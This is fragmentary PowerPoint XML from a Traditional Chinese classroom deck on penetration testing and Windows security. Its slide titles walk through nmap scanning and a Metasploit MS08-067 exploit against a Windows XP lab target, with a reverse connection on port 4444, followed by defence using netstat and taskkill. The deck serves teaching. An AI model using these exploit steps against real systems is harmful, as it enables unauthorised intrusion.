            <a:ext cx="3669406" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>netstat –ano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>查看網路連線狀態</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984FE0C7-EAFA-4E88-8FAF-7BF48C1B5BF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5718220" y="3670479"/>
            <a:ext cx="4713667" cy="2060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9EFA8AE2-C0C4-436D-BB32-DEDA53F850AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2401910" y="4073383"/>
            <a:ext cx="4211392" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>這是剛剛用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>建立起來的連線</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21613046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3F450E-AC0A-426F-85DD-6EB4DE375F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>taskkill /?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05714C2C-586D-47E2-B033-596B63D7F8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85562" y="1027906"/>
            <a:ext cx="7605464" cy="5713558"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文字方塊 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDA822E0-8D29-4D98-AB56-31FF3D1380CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152170" y="1626293"/>
            <a:ext cx="3451538" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>taskkill /? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>查看參數</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3805334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60988-B1A6-474F-81AF-7F8A89157CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>taskkill /F /PID pid</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF603D6B-77FA-475A-AF2A-19AEC484A6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772" y="1423052"/>
            <a:ext cx="7013035" cy="5268500"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA5D7C0-F3D9-472C-8330-E0A1EEAF2C6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="55528" b="63505"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160612" y="3352173"/>
            <a:ext cx="6785616" cy="3059761"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB80F117-CB8F-49B4-8FDA-81B284C11432}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4997003"/>
            <a:ext cx="3605011" cy="4379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A2DB6B3D-DE71-4ED3-8A91-5C8BD828A60C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5160612" y="5847008"/>
            <a:ext cx="4923546" cy="3477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E4FE443E-FAAE-4C5C-95AE-35281DBF525B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6684136" y="2269212"/>
            <a:ext cx="4953000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>的連線被從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>端中斷</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="箭號: 向右 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907A30CF-1B9E-4FA9-A5EC-D65E10C766AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1689618">
            <a:off x="4718016" y="4849500"/>
            <a:ext cx="885188" cy="73294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194461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216A6C-2D1A-4795-8A9F-925FBEA569B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US">
                <a:latin typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" panose="020B0604030504040204" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>謝謝大家</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8D170E9-0F8F-417A-AC5C-739501A2F3DF}"/>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1447111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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>系統的資安威脅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文字方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824862" y="6334125"/>
            <a:ext cx="8458200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://www.bnext.com.tw/article/60631/ot-ia-securty-hacker-basic-qa</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW"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0174" y="1428750"/>
            <a:ext cx="5227576"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6556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latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>系統的資安威脅</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文字方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="6240244"/>
            <a:ext cx="11715750" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://technews.tw/2020/09/01/mac-security-threats-are-getting-higher-and-higher-and-malicious-software-is-actually-certified-by-apple/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW"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4631" y="1320329"/>
            <a:ext cx="6415088" cy="4847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1556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923925" y="2174875"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2020 CWE Top 25 Most Dangerous Software Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">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240111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a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2020 CWE Top 25 Most Dangerous Software Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>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2493028" y="6271657"/>
            <a:ext cx="7010400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>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81224" y="1658993"/>
            <a:ext cx="7634007" cy="429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4635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a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
                <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2020 CWE Top 25 Most Dangerous Software Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:latin typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
              <a:ea typeface="微軟正黑體" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW"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372" y="1600757"/>
            <a:ext cx="4706107" cy="4801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2484595"/>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5373</TotalTime>
  <Words>1560</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>124</Paragraphs>
  <Slides>48</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48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="54" baseType="lpstr">
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>滲透測試與系統安全 Windows安全測試報告</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>系統的資安威脅</vt:lpstr>
      <vt:lpstr>系統的資安威脅</vt:lpstr>
      <vt:lpstr>系統的資安威脅</vt:lpstr>
      <vt:lpstr>系統的資安威脅</vt:lpstr>
      <vt:lpstr>2020 CWE Top 25 Most Dangerous Software Weaknesses</vt:lpstr>
      <vt:lpstr>2020 CWE Top 25 Most Dangerous Software Weaknesses</vt:lpstr>
      <vt:lpstr>2020 CWE Top 25 Most Dangerous Software Weaknesses</vt:lpstr>
      <vt:lpstr>Windows insecurity 2020</vt:lpstr>
      <vt:lpstr>Windows insecurity 2020</vt:lpstr>
      <vt:lpstr>Windows insecurity 2020</vt:lpstr>
      <vt:lpstr>滲透測試 Penetration Testing</vt:lpstr>
      <vt:lpstr>滲透測試（Penetration Test，PT）</vt:lpstr>
      <vt:lpstr>滲透測試流程</vt:lpstr>
      <vt:lpstr>前期互動階段</vt:lpstr>
      <vt:lpstr>情報蒐集階段</vt:lpstr>
      <vt:lpstr>威脅建模階段</vt:lpstr>
      <vt:lpstr>漏洞分析階段</vt:lpstr>
      <vt:lpstr>滲透攻擊階段</vt:lpstr>
      <vt:lpstr>後滲透攻擊階段</vt:lpstr>
      <vt:lpstr>撰寫報告階段</vt:lpstr>
      <vt:lpstr>滲透測試方法論</vt:lpstr>
      <vt:lpstr>滲透測試方法論</vt:lpstr>
      <vt:lpstr>滲透測試方法論</vt:lpstr>
      <vt:lpstr>Windows滲透: 從nmap 到metasploit</vt:lpstr>
      <vt:lpstr>檢查自己跟靶機的IP</vt:lpstr>
      <vt:lpstr>nmap -o ip</vt:lpstr>
      <vt:lpstr>nmap –p 0-65535 IP</vt:lpstr>
      <vt:lpstr>SMB on XP</vt:lpstr>
      <vt:lpstr>nmap –script smb-vuln-ms08-067.nse –p 445 IP</vt:lpstr>
      <vt:lpstr>nmap -script vuln IP</vt:lpstr>
      <vt:lpstr>msfconsole</vt:lpstr>
      <vt:lpstr>search ms08_067</vt:lpstr>
      <vt:lpstr>use exploit/windows/smb/ms08_067_netapi</vt:lpstr>
      <vt:lpstr>show options</vt:lpstr>
      <vt:lpstr>set RHOST IP</vt:lpstr>
      <vt:lpstr>攻擊端防火牆要允許Port 4444進入</vt:lpstr>
      <vt:lpstr>手動指定Target到33(XP SP3 台灣正體)</vt:lpstr>
      <vt:lpstr>sysinfo</vt:lpstr>
      <vt:lpstr>移動到桌面</vt:lpstr>
      <vt:lpstr>建一個資料夾</vt:lpstr>
      <vt:lpstr>Take a screenshot</vt:lpstr>
      <vt:lpstr>Windows defense: 從netstat 到 taskkill</vt:lpstr>
      <vt:lpstr>netstat -ano </vt:lpstr>
      <vt:lpstr>taskkill /?</vt:lpstr>
      <vt:lpstr>taskkill /F /PID pid</vt:lpstr>
      <vt:lpstr>謝謝大家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ksu</dc:creator>
  <cp:lastModifiedBy>鄭勝峰</cp:lastModifiedBy>
  <cp:revision>80</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-25T01:09:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-12T18:37:47Z</dcterms:modified>
</cp:coreProperties>
</file>